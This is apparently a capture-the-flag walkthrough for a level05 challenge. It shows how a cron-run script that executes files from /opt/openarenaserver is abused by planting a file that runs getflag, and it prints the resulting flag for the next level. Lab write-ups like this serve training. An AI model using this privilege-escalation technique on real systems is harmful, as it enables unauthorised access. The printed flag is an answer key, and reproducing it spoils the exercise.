- Nothing is found first, and we try to find any clue. Let's check list of environmental variables:
- There is interesting line here:
MAIL=/var/mail/level05. This file contains
*/2 * * * * su -c "sh /usr/sbin/openarenaserver" - flag05
*/2 * * * * looks like format of crontab utility for timed launch of programs. According to line above, shell script /usr/sbin/openarenaserver lauches every 2 minutes- Script
/usr/sbin/openarenaserver contains
#!/bin/sh
for i in /opt/openarenaserver/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done
- Script grabs all files from
/opt/openarenaserver/, executes them and deletes afterwards
- Let's create file
/opt/openarenaserver/flag05, that will execute getflag when launched and write output to temporal file, and chane file permissions
echo "getflag > /tmp/flag05" > /opt/openarenaserver/flag05
chmod 777 /opt/openarenaserver/flag05
- Now wait for around 2 minutes. Than reveal in file /tmp/flag05 flag for level06 user: viuaaale9huek52boumoomioc